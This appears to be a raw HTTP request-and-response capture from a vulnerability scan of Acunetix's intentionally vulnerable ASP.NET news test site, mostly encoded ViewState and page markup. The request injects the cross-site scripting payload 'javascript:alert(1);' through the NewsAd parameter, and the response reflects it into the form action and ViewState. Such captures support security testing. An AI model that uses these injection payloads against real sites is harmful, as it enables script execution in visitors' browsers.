ICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkfCyPhouoc9T07CkSiDvxgplY0cc%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKx7LcVArvjq48MAu2JnvwLAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w8CjfeklgcCjfeklgcCjffYKgKN99gqAo33jJINAo33jJINAo33oKkGAo33oKkGAuads94JAuads94JAuadp%2FUCAuadp%2FUCAuad24kKAuad24kKAuadz6wDAuadz6wDAuad48MMAuad48MMAuadl%2BYFAuadl%2BYFAuadi70NAuadi70NAuadv9AGAuadv9AGAuadk7kDAuadk7kDAuadh9wMAuadh9wMAvukkcUPAvukkcUPAvukhZgHAvukhZgHAvukuT8C%2B6S5PwL7pK3SCQL7pK3SCQL7pMH2AgL7pMH2AgL7pPWNCgL7pPWNCgL7pOmgAwL7pOmgAwL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DyY4AmtQ6l9yclXqngVcemir9JWKResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:07:20 GMT Content-Length: 30520Response body (30520 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=javascript%3aalert(1)%3b&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFFGphdmFzY3JpcHQ6YWxlcnQoMSk7ZGQzvo47hQg5wK0PpdlFgvCFi0HdJQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLC0a+LDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8s69RmrC7Xn7opyEj4DL1LJe6q9w==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> 